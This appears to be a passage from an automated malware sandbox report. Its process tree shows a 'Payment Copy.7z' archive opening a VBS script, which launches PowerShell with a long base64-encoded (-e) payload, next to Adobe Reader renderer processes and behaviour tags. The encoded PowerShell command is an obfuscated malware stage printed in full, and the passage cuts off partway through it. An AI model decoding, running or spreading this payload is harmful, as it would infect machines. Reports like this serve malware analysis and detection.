    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CAF71CA19A6571521005BA0E31AD2488 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CAF71CA19A6571521005BA0E31AD2488 --renderer-client-id=5 --mojo-platform-channel-handle=2340 --allow-no-sandbox-job /prefetch:1
    3⤵
    PID:4404
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=41530B11EB6EAF7B04373B765D58E4C4 --mojo-platform-channel-handle=2584 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:3136
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3F912A8F3F5DA68B61A69B75CA2B33DC --mojo-platform-channel-handle=1964 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:4716

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4124

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1508

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5916

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Payment Copy.7z"
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5996
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zOC6791E57\Payment Copy.vbs"
  2⤵
  - Checks computer location settings
  PID:6048
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -e "JABUAHUAbgBlAG4AZQBkAGUAbQAgAD0AIABAACcADQAKAEIAaQBnAG8AdABBAEYAYQBlAHIAZABkAEYAcgBzAG4AaQBkAHQAZQBwAGkAZAAtAFMAdAB1AGIAYgBUAEsAdQBiAGkAawB5AEgAYQBsAGEAYwBwAEQAaQBzAHQAYQBlAFIAbwB3AGUAcgAgAEIAZwBlAG4AbwAtAEsAbwBsAHAAbwBUAEQAcgBhAG4AawB5AFAAbwBsAGEAawBwAEYAbwByAHQAcgBlAEwAZQBuAGcAZQBEAEoAZQB0AG0AYQBlAFUAbABpAHQAaQBmAFQAbwB0AGEAbABpAFAAcgBlAGMAZQBuAFMAbQBhAHMAaABpAEgAbwBtAG8AbAB0AEQAaQBkAHUAYwBpAEQAaQB2AGUAcgBvAEYAbwByAHMAbQBuAEEAcwBoAGwAYQAgAEUAeQBlAHMAdABAAFMAdABvAGwAbwAiAAoARgBhAGIAagBlAHUAQwBsAGEAeQBpAHMAUgBhAGYAbABpAGkATABhAHIAcwBlAG4AUwBlAGwAdgBhAGcASQByAG8AbgBpACAAbABpAG4AawBhAFMAQQBkAGoAZQBrAHkARgBvAHIAcwBnAHMAUwB0AHkAbABpAHQAQQB0AGUAbABpAGUAQgBvAHcAbABhAG0AUgBpAGQAZABlADsACgBBAG0AbQBlAGUAdQBJAGEAZwB0AHQAcwBTAG8AdABlAHIAaQBTAHUAbAB0AGUAbgBDAG8AcgB5AGIAZwBMAGUAbgBzAHQAIABQAGEAcwBzAGEAUwBwAHUAawBhACAAeQBTAGUAagBsAHMAcwBNAGEAZwBuAGUAdABSAGUAaQBuAGoAZQBDAG8AbQBwAGEAbQBNAGUAdABpAG4ALgBGAGwAdQBvAHIAUgBUAGEAYgBlAGwAdQBSAHIAbABlAGQAbgBSAGUAYQB3AGEAdABIAGEAbgBnAGEAaQBIAG8AcgBlAGgAbQBCAGEAZgBhAHIAZQBUAHYAYQBuAGcALgBMAHUAZgB0AGYASQBNAGkAcwBtAGUAbgBHAGEAcwBmAGwAdABOAGUAZwBlAHIAZQBSAGUAbABhAHQAcgBCAGUAZABsAGEAbwBGAGwAZQByAHMAcAB2AGkAcgBhACAAUwBSAGUAcAB1AGIAZQBLAGEAZgBmAGUAcgBOAHUAbABsAGkAdgBVAGQAZwBpAHYAaQBIAGUAZABnAGUAYwBNAHUAZABkAGUAZQBWAGkAYwBhAHIAcwBCAHUAbgBkAHQAOwAKAE0AdQBsAHQAaQBwAGUAbABlAGsAdAB1AEEAcgBiAGkAdABiAE0AbwBkAGUAcgBsAFYAZABkAGUAcgBpAFMAdQBqAGUAdABjAEEAcgBiAG8AdQAgAEcAeQByAGEAdABzAEgAagBlAHIAdAB0AFYAcgBkAGkAZgBhAFMAYQBsAGEAdAB0AE4AcgBpAG4AZwBpAEQAZQBmAHIAYQBjAEkAbgB2AGUAdAAgAEsAeQBtAG8AZwBjAEgAbwBvAHYAZQBsAEYAYQBrAHQAbwBhAEkAbQBhAGcAaQBzAEEAbgBuAGUAawBzAEIAaQBkAHMAbAAgAFMAdABvAG0AYQBIAFMAaQBiAGkAcgBvAFQAZQBsAGUAcwBuAEcAbABhAGkAcgBuAEwAeQBrAG4AcwBpAEYAcgBvAGsAbwBuAEEAcABwAG8AcgBnAGYAcgBvAG4AdABtAEYAcgBlAGUAYgAxAAoAUABhAHIAbABhAHsAUwBlAHQAaABzAFsAbAB1AHgAdQByAEQATQBpAGMAcgBvAGwAUABvAG0AcABvAGwARQB4AGEAZwBnAEkAUwB0AGUAZABzAG0AQwB1AHIAbABlAHAARQByAGgAdgBlAG8AdQBkAGUAbgByAHIAQQB0AGkAbwBuAHQAQQBtAHAAaABpACgARgBkAHMAZQBsACIAVQBuAHEAdQBpAHUAYgBlAGwAeQBzAHMAQwB1AHMAcwBpAGUATwBiAHMAZQBxAHIAQQBmAHMAawB5ADMAdQBsAGMAZQByADIATgBpAG8AbgB0ACIASQBzAG8AYwBoACkAUgBhAG0AYgB1AF0ARgBpAGQAaQBiAHAAQwBlAG4AdAByAHUAUwB1AG0AbQByAGIAUwB0AHIAbQBrAGwAVABpAGwAZABpAGkATAB1AHQAZQBvAGMAUwB0AHYAbABlACAAQQBmAHMAcABlAHMARgByAGkAawB0AHQAVgBlAHIAZABlAGEARgByAGUAbQBzAHQAZwBlAG4AdABsAGkASAB5AHAAZQByAGMAVQBuAHYAYQB1ACAAQwB5AHAAcgBpAGUATQBpAGwAbABpAHgAUABzAGUAdQBkAHQASwB5AHMAaABhAGUATwBkAHkAcwBzAHIARgBvAHIAZwBpAG4AWgBpAHAAaABpACAATwB1AHQAbQBvAGkAQgBlAHUAbgBpAG4ASgBhAHIAbwBvAHQARQBmAHQAZQByACAARwBhAGkAYgBsAFMAUABhAG4AaQBjAGUAUAByAG8AZAB1AHQATABpAG0AZQB3AFQAQwBpAGYAcgBlAGgAQgBpAGcAbABlAHIAUwBrAHUAZQBiAGUARABlAG4AdQBuAGEAQwBoAGUAYQB0AGQAUAByAGUAZABpAEQARQByAG8AYgByAGUAUwBhAG0AYgBhAHMAQQBtAG8AcgBvAGsAVQBuAHIAYQB0AHQARgBqAGUAcgBuAG8ATQB1AHIAaQBmAHAATQBhAGwAbABlACgAUwBlAHIAbwBmAGkAVgBpAHIAZwB1AG4AUAByAGUAYwBvAHQAUABhAHIAYQBnACAAYwBvAGwAbABpAEIATABlAG0AcABpAGUAVQBkAHYAbABnAHQAUwB0AGUAbQBwAGEASABqAHIAZQBwAGUAdABpAGwAYgBhACkAQwBhAGQAZQBuADsACgBDAHIAZQBwAGUAWwBMAG8AbwBzAGUARABSAGUAZwB1AGwAbABTAHAAZQBjAGkAbABVAG4AYwBvAG4ASQBQAG8AZQBzACAAbQBMAG8AZwB3AG8AcABNAGEAcwB0AG8AbwBWAGwAaQBnACAAcgBEAGkAZgBmAGUAdABLAG8AcgByAGkAKABUAGUAcwBzAGUAIgBBAGQAbwBwAHQAdQBMAG8AZwBvAG0AcwBUAGoAZQBuAGUAZQBTAG8AcgBnAGwAcgBEAGkAcgBlAGsAMwBTAHQAagBlAHIAMgBQAHIAZQBjAG8AIgBTAHUAbQBsAG8AKQBJAG4AZABvAGwAXQBTAGUAbQBpAHMAcABSAGUAcwBwAGUAdQBGAG8AcgBzAHQAYgBLAHIAYQBrAGsAbABBAGMAYQBuAHQAaQBVAG4AcwB0AHIAYwBCAGUAbAB1AHIAIABTAGUAbgBhAHQAcwBCAHUAcgByAGkAdABTAGgAaQByAHQAYQBJAG4AYwBvAGcAdABXAGkAbgBzACAAaQBHAHIAbwB3AHMAYwBOAGUAbwBwAGkAIABVAG4AbABvAHYAZQBPAHAAcgB1AGwAeABSAGkAdABtAGUAdABEAGkAYQB6AGkAZQBDAG8AbABsAGEAcgBMAG4AbQBvAGQAbgBQAHIAbwBzAGUAIABDAG8AbgBkAGUAaQBVAGQAaAB1AGcAbgBBAG0AbQBvAG4AdABUAGUAeAB0AHUAIABnAGEAbABpAG8ARABGAG8AcgBoAGUAZABPAHAAYgByAGEAZQBVAG4AaABlAHUAQwBCAGUAdABpAG4AbABTAGsAbgBrAGUAaQBNAGUAcgB2AHIAZQBzAGsAYQBnAGUAbgBNAHUAbgBpAHMAdABTAHkAawBvAGYAVABHAGQAbgBpAG4AcgBEAGUAcAByAGkAYQBTAHkAZABzAGkAbgBTAGUAbQBwAGwAcwBQAGUAawBpAG4AYQBWAG4AbgBlAHIAYwBCAG8AZwB0AHIAdABXAGgAaQBmAGYAaQBLAG4AZQBqAHAAbwBHAG8AbgBvAHIAbgBXAGgAZQBhAGwAKABLAG8AbABvAG4AaQBEAHUAbgBoAGEAbgBLAG8AcgBlAG4AdABQAG8AcwBzAGUAIABLAHUAbAB0AHUAUgBOAHUAZABhAG4AbwBGAG8AcgBrAHUAaQBEAGUAYQBkAGkAbABFAGsAbQBhAG4ALABTAHAAaQBrAGUAaQBKAHUAbABpAGUAbgBUAGUAcgBtAGkAdABMAG8AcgBlAG4AIABQAGgAbAB5AGMAVAB2AHIAZABpAGcAaQBUAG8AYgBhAGMAbABMAHkAcwBrAG8AcABTAGUAbgB0AGkALABTAGEAbQBsAGUAaQBJAG4AZABiAGwAbgBCAHIAYQBuAGQAdABIAGEAYQBuAGwAIABrAHIAZQBwAGUAUgBEAHIAZQBuAGcAbgBBAG4AbgBhAG0AawBnAHUAaQBsAHQAZQBQAHIAaQBtAGEALABTAHQAYQB0AHMAaQBTAHAAZQBhAHIAbgBXAGUAZQBrAGUAdABkAHUAbgB5ACAAIABOAG8AbgBwAGEAQQBNAGkAcwBzAGkAZgBTAGkAZwBuAGEAZABGAGoAbwBsAHMAYQBVAHYAYQBuAGwAbQBVAG4AdABpAHIALABGAG8AcgBzAGsAaQBEAGUAZgBlAG4AbgBSAG8AdABvAHIAdABNAHUAbAB0AGkAIABTAHUAYgBjAG8AVABNAGUAZABpAGEAaQBGAHUAdAB1AHIAbAB0AGkAbgB0AHkALABCAG8AdgBzAHAAaQBJAG4AdgBvAGwAbgBSAGUAbQB1AGwAdABUAGgAeQBiAG8AIABUAG8AbQBvAHIAUABGAHIAaQB0AGkAYQBBAG4AdABpAGMAbgBTAG8AdQBuAGQAdABnAHIAYQBuAHQAcwBGAGEAcwB0AHQALABsAGkAZwBlAHYAaQBSAG8AbwBmAGkAbgBIAG8AcgBvAGwAdABDAGkAcgBrAGUAIABBAGcAZwBsAHUATwBUAGkAdABhAG4AdgBCAGkAaAB1AGwAZQBLAGEAbgBkAGkAcgBTAGMAaABmAGUAcwBNAGUAZABqAGkANQBQAHIAbwBtAG8AMQBTAGsAbwBiAHIALABKAGEAegB6AGcAaQBQAGEAcwB0AGwAbgBEAGkAdABlAHQAdABEAGkAcwBrAG8AIABSAGUAcwBwAHIAQgBTAHUAYgB0AG8AZQBCAGUAcgBzAHIAcwBXAGEAYwBoAG4AaABDAGwAeQBzAG0AKQBwAGUAbgBkAHUAOwAKAFUAbgBzAG8AbwBbAE0AYQBuAHcAZQBEAFMAdABlAG4AaQBsAFIAYQBkAGkAYQBsAFUAcwB1AHIAcABJAEsAcgBlAGQAcwBtAEMAbwB3AGEAZwBwAFIAaQBqAGsAcwBvAEwAaQBuAGQAcgByAEUAeAB0AHIAYQB0AFMAcABuAGQAcwAoAGUAbgBoAGUAcgAiAEQAdQBhAGwAYQBBAE0AaQB0AHMAdgBEAFMAdABhAHIAbABWAFAAbwB0AGwAYQBBAEIAaQBzAHAAZQBQAFAAbwByAGUAbgBJAFMAbABvAGcAZQAzAE0AdQBsAHQAaQAyAFQAaQBsAHMAawAuAFIAZQBjAHQAbwBEAFUAbABlAG0AcABMAFQAcgBpAGsAcwBMAEUAbQBpAGcAcgAiAE8AcABzAGEAbgApAFMAdABpAGsAcwBdAEEAZABnAGEAbgBwAE4AaQBwAHAAZQB1AFUAbgBoAGUAbABiAE0AYQBrAHIAbwBsAFAAcwBlAHUAZABpAEEAcgBpAHQAaABjAEMAYQBtAGIAaQAgAE0AYQBsAGEAYwBzAEcAbwBrAGEAcgB0AGEAdQByAG8AcgBhAEsAdgBsAGQAIAB0AEwAdQBnAHQAZgBpAFMAdQBwAGUAcgBjAFMAcQB1AGEAbgAgAE0AYQB0AGMAaABlAEUAbgByAGEAeQB4AHAAcgBvAGMAdQB0AEQAZQByAG8AZwBlAFQAaQByAHoAYQByAEIAZQBzAHQAdABuAFIAdgBlAHIAawAgAFMAYQByAHIAYQBpAFMAYQBnAG4AZABuAFAAagBlAHYAcwB0AEEAbABsAGkAYQAgAHIAaQBnAHMAYgBMAEwAaQB0AGgAbwBvAEwAdQBuAGcAZgBvAFAAcgBvAHoAeQBrAFAAZQBuAGQAbAB1AEUAYQByAGwAaQBwAGQAZQBsAGUAdABBAFYAYQBuAGQAcABjAE4AZQByAHYAZQBjAFIAaQBuAGcAbQBvAEUAbgB2AG8AeQB1AFAAZQBrAGkAbgBuAEYAZQBtAGkAbgB0AE8AcgBkAGQAZQBTAFAAcgBlAGMAaQBpAEEAYwBjAGwAaQBkAFQAYQBsAGUAbQAoAEIAbwBsAGkAZwBpAGIAbAByAGUAawBuAEYAcgBlAG0AcwB0AEUAcQB1AHUAbAAgAEQAZQBuAGQAcgBLAFUAZAB2AGkAZABpAFcAbwByAHIAeQBlAFMAdABvAG0AYQByAFQAZQByAGEAdAA1AEsAdQBnAGwAZQAxAE0AZQBsAGwAZQAsAGkAbQBwAHIAaQBpAFEAdQBhAGQAcgBuAEYAaQByAGQAbwB0AEQAZQByAGEAdAAgAEkAbgBkAHYAdgBFAHIAZABiAGcAZQB4AFMAdABhAHQAdQBjAEIAeQBnAGcAZQB1AEEAYwBjAGUAbAAsAFAAcgBvAHAAdABpAEIAZQBzAGwAdQBuAFAAdABlAHIAeQB0AHMAawB2AGEAZAAgAEIAagBsAGUAcgBEAEcAYQBuAGUAIAB2AEQAaQBhAGQAbwBlAEEAbABsAHUAcwBrAEYAcgBhAHQAaQBvAGwAbwBhAGQAcABuAEEAcwB0AHIAYQAsAEMAYwBpAGwAaQBpAGwAYQB0AGUAcgBuAFAAYQByAG8AbgB0AEMAbwBuAHMAaQAgAEgAbwBsAHMAdABTAEsAbwBuAGsAbAB1AEEAZgBuAGQAZQByAEYAZQBsAGkAYwBtAFUAZABrAG8AYgAsAG0AZQBnAGEAbABpAFAAaABvAHQAbwBuAFUAbgBpAG4AcwB0AEUAawBzAHQAZQAgAFMAdgBpAG4AZwBSAFYAbgB0ACAARgBoAFMAaQBkAGUAdgBvAEYAZQBhAHQAaABkAEYAbwByAHAAbABvAE0AbwByAHUAYQBtAEgAagBlAHIAdAAsAE8AYgBmAHUAcwBpAEQAaQBhAGcAbwBuAEIAbABhAGEAaAB0AFAAZQByAHYAZQAgAFUAcwB0AGkAbABsAEgAbwBiAGUAZABhAEsAbgBlAGUAIABjAGwAbwBlAG4AdABlAFcAYQBuAGQAZQAsAEEAcwBzAG8AYwBpAEEAdQBrAHQAaQBuAEsAaQBuAGUAcwB0AG4AbwBuAHIAZQAgAFQAcgBhAG4AcwBCAFMAawB1AGUAcwBvAE0AaQBjAHIAbwBnAEYAYQB2AG8AdQBtAFMAZQBsAGUAbgByAEgAbwBsAGwAIABrAE8AbQBzAG8AcgApAFAAZQByAGkAcAA7AAoATABhAGcAZABlAFsAQwBlAG4AcwB1AEQAUwB0AHkAbABvAGwAdABvAG4AcwBpAGwATQBhAGQAbwBwAEkAQQB1AHQAbwBzAG0ASQBzAG8AYwBoAHAASQBuAHQAZQByAG8ARgBvAHIAaABhAHIAUwBuAGQAZQByAHQAVQBuAHIAZQBjACgAQQBuAHMAagBvACIAQQBkAGUAbgBvAHcAZQBuAGQAbwBwAGkASQBuAGQAcwB5AG4ATABlAHQAcwB2AG0AVABoAGEAbgBrAG0AUwB0AGEAdAB1AC4AVABlAGMAaABuAGQAUwB5AG0AYgBvAGwATQB1AGwAdABpAGwARwByAHUAbgBkACIASQBuAGQAaQBnACkAQwBlAGwAaQBvAF0AUABlAGsAZQBzAHAARABlAHMAYQBsAHUAawBlAHIAcwBlAGIAQwBhAHUAcwB0AGwAUgBzAHQAIABCAGkATwB1AHMAdABlAGMATwB2AGUAcgBkACAATQBhAHIAYgBsAHMAdQBuAGMAbwBuAHQAdwBpAHQAYwBoAGEAQwBlAHIAbgBlAHQAVABhAHMAaABsAGkAUABhAHAAaABpAGMAdwBhAGEAZwBlACAAUgBpAG4AZwBlAGUARQBsAGUAYwB0AHgAUwB0AGEAYgBsAHQARwBlAG4AbwBwAGUAUwBrAGkAbABkAHIAVABpAGwAcwB0AG4AVQBsAGUAbQBwACAAQQBnAGcAbAB1AGkAQgBpAGsAbABhAG4AdABpAGwAbABvAHQAcwB1AHAAZQByACAAQQByAHQAbwB0AHcAQQB1AHQAbwBtAGEAVQBkAHMAYQBnAHYAVAB1AHIAcABlAGUASQBuAGQAZQBrAE8ARwBhAHMAdAByAHUAQQByAGIAZQBqAHQAVABhAHIAcwBvAEMARwB1AHMAIABBAGwATQBlAHQAcgBvAG8AQgBhAGcAYQBnAHMAQgByAGQAZABlAGUAUwBwAGgAaQBuACgAUQB1AGEAdgBlAGkAUwBhAG4AZABqAG4AUgBvAGUAbgB0AHQAVQBkAHMAcABlACAAUwB1AGIAaQBuAFIAUwBhAG0AawB2AG8ASABvAG0AbwBiAG0AVQBuAGQAbwB0AGEARABhAHQAZQBhAG4ARABpAGEAZwBuAG0ASwBvAG0AbQBlACkAUwB1AHAAZQBsADsACgBFAHgAaABhAHUAWwBwAGUAbgBuAGUARABDAGEAYwBoAGUAbABEAGUAZwBlAG4AbABCAHUAYwBrAGEASQBIAGUAbABsAGkAbQBEAGUAZgBlAG4AcABDAGEAbAB2AGkAbwBwAHIAZQBzAHQAcgBBAG4AdABpAHAAdABLAGwAYQBkAGQAKABEAGUAbwBkAG8AIgBNAHkAcgBpAG4AZwBTAHUAcABlAHIAZABLAGwAZABuAGkAaQBNAGEAcgBpAG4AMwBQAHIAbwBmAG8AMgBVAG4AZABpAGMAIgBTAHUAcABlAHIAKQBCAHkAbgBhAHYAXQBNAGUAdABhAGwAcABNAGkAcwBwAGEAdQBCAHUAcwBrAHAAYgBUAGEAbgBkAHQAbABhAHYAZQBkAHIAaQBNAGEAdgBlAHIAYwBSAHUAZABrAGIAIABNAGEAdAB1AHQAcwBTAHQAYgAgAEIAdABOAGUAdQB0AHIAYQBEAHIAbwB1AHQAdABNAGEAdAByAGkAaQBUAHcAaQBuAGkAYwBVAGQAYQByAG0AIABEAGUAcwBjAHIAZQBTAGUAYwB0AGEAeABVAGQAcwB0AHkAdABBAG0AYgB1AGwAZQBBAG4AdABpAG0AcgBTAHQAcgBpAHAAbgBQAHUAZABlAG4AIABCAGEAbgBkAG8AaQBGAGUAdQBkAGEAbgBDAHIAeQBwAHQAdABlAHYAbwBsAHUAIABJAHMAbgBhAGQAQwBIAGEAcgBwAG8AcgBQAHIAZQBzAGIAZQBTAHYAYQBsAGUAYQBRAHUAbwBoAG8AdABSAG4AZABlAHMAZQBHAGwAeQBjAG8AQgBDAGgAYQBuAGUAaQB2AGEAbABnAGUAdABUAHIAYQBhAGQAbQBQAHUAbABwAHkAYQBSAGEAbgBkAG0AcABOAGEAZwBlAHQASQBFAG4AdABhAGwAbgBOAGkAYwBrACAAZABEAGUAcABpAGwAaQBDAGwAYQBtAG0AcgBGAG8AcgBtAGkAZQBVAGQAawBvAG0AYwByAGEAbgBzAGEAdABBAGMAZQB0AHkAKABTAHkAbgBjAGgAaQBuAG8AbgBjAGEAbgBTAHUAbABwAGgAdABBAGsAdQB0AGIAIABGAG8AcgBzAG0AVgBTAGUAeABlAG4AYQBVAG4AcwBjAHUAdABGAHUAbABkAHIAaQBUAG8AbwB0AGgAKQBJAG4AZgBvAHIAOwAKAEsAbgBnAHQAZQBbAEYAcgBlAGQAcwBEAEQAZQBwAHIAZQBsAGMAbwBiAGQAZQBsAEQAYQBtAG8AawBJAEYAcgB1AGkAdABtAEIAcgBuACAAQQBwAGYAZQBzAHQAaQBvAEMAbwBoAHUAcwByAEcAeQByAGUAYwB0AEkAbgB0AGUAcgAoAEEAbABkAGEAbQAiAEoAZQByAGkAYgBrAFQAcgBhAG4AbgBlAFIAZQBzAHQAaQByAE8AdgBlAHIAaQBuAFMAcgBsAG8AdgBlAEEAbgBnAGUAbABsAFQAbwBsAHUAeQAzAFMAcABpAGwAZAAyAEsAbwByAHIAbwAiAFYAYQB0AHQAZQApAEoAdQBsAGUAYQBdAFMAaQBrAHIAaQBwAFEAdQBpAGQAZAB1AEsAdQBjAGgAZQBiAFQAbwBsAGQAcABsAFUAcwBhAGcAbABpAFUAbgBoAG8AbgBjAEMAbABlAHAAdAAgAEMAYQByAHIAbwBzAHYAaQBnAHQAaQB0AEsAbwBuAG8AbQBhAEMAdQBjAHUAbAB0AGYAYQB1AGcAaABpAFMAcABvAHIAcgBjAE0AYQByAGsAZQAgAFMAYQBsAHYAaQBlAEcAbABvAHQAdAB4AE0AaQBzAGIAcgB0AEcAcgBhAHAAaABlAHQAcgBhAG4AcwByAEYAaQBuAGEAYgBuAEgAbwB5AGQAZQAgAEgAdQBuAGQAcgBpAEYAcgBpAGsAaQBuAFAAaABvAGwAYQB0AFAAdQBiAGwAaQAgAEYAcgBlAGUAbQBHAEMAbABlAHAAaQBlAEIAZQByAGUAdAB0AEIAdQBsAGQAZQBPAEcAZQByAG4AaQB2AEUAbgBkAGUAYgBlAEQAYQBuAG4AZQByAEsAbwByAGUAYQBsAFMAcABvAHIAdABhAEYAYQB1AGwAdABwAFUAbgBzAGkAbgBwAE0AeQBvAHAAaABlAFIAYgBvAGUAcgBkAE4AcgB0AGYAbwBSAFQAcgBpAG0AbQBlAE4AZQB0AHQAbwBzAE0AbwBuAG8AcwB1AEIAYQBkAGUAbABsAFAAaABpAGwAdAB0AEIAYQByAGIAaQAoAFYAaQB0AHIAaQBpAEcAZQBuAG4AZQBuAEEAcgBkAHMAIAB0AEEAdQBrAHQAaQAgAE8AYwBlAGEAbgBCAEEAbAB1AG0AaQB1AEYAbwByAHQAcgBkAFMAeQB0AHQAZQAsAFQAZQBsAGwAaQBpAE0AYQBuAGQAYgBuAEUAdgBpAGMAdAB0AEMAaABhAG0AaQAgAHQAcgBmAGYAZQBUAEgAdQBkAGkAYgB1AEwAZQB2AG4AZQByAEMAbwBhAGQAagBkAFIAZQBnAGEAbAAsAGQAZQBhAHQAaABpAEEAbgBnAG8AcgBuAEYAaQBuAGcAZQB0AE8AYgBzAGsAdQAgAFMAdAB5AGwAdABZAEYAdQBuAGsAdABhAGoAZQByAG4AZwBjAFUAZgBvAHIAcwBoAFAAbABhAHMAbQAsAFMAdAByAGEAcABpAEwAbwB2AGcAaQBuAEUAZgB0AGUAcgB0AEcAZQBuAG4AZQAgAEQAeQBzAGwAYQBVAEMAbwBuAHQAdQBuAEIAbAB1AGUAYwBmAEMAaABhAG4AbgBsAEMAZQBuAHMAbwApAFAAbwBjAGgAaQA7AAoAUAByAG8AZwByAFsAdQBzAGgAZQByAEQAQgBpAGwAdAB5AGwATQBhAHMAcwBjAGwAUgBpAG0AcABsAEkAdABvAHEAdQBlAG0AQgBvAG4AZABlAHAAVgBvAGwAdABtAG8ASQBuAHMAcABpAHIATQB1AHMAZQB1AHQASwBvAG4AcwBvACgARAByAGkAZgB0ACIAUwBlAGsAcwB0AGsAUwBwAG8AbABlAGUAUABsAGEAbgBrAHIARgB1AHIAbQBlAG4AUwBrAGEAdABzAGUATwB2AGUAcgBmAGwAUQB1AGEAbgB0ADMAQgBhAHMAZwB1ADIARQBuAHAAdQBrACIAUABoAHkAbABsACkARABhAHQAYQBiAF0ASAB2AGUAZABlAHAASABqAGUAcgB0AHUAUwB2AG8AdgBsAGIATwBwAGQAcgB0AGwAUwBvAGwAZABpAGkAQQByAGIAZQBqAGMARgBvAHIAdABsACAAUABoAGwAZQBiAHMARgBhAHYAbwBzAHQATwB0AG8AbABvAGEAWQBuAGsAdgByAHQAcABlAHQAcgBvAGkASQBuAHQAZQByAGMAVQBuAGEAZgBmACAAVAB1AGcAdABoAGUAQgBpAGwAaQBuAHgASwByAHkAcwB0AHQAdQBuAHcAZQBhAGUATQBvAGQAYQByAHIARQBsAGUAZgBhAG4AUwBwAGkAcwBlACAARwBuAG8AbQBvAEkAUwB1AHIAcAByAG4AQQB1AG0AaQBsAHQASABvAG0AaQBsAFAAQQBmAHMAdgBhAHQAbQBhAHIAYwBoAHIAQgBvAHIAZwBlACAARwB3AGEAaQBuAEUATgBvAG4AbQBlAG4ARgBvAG4AZQB0AHUAVQBuAGQAZQByAG0AQQBuAGUAcgBvAFMAUwB5AG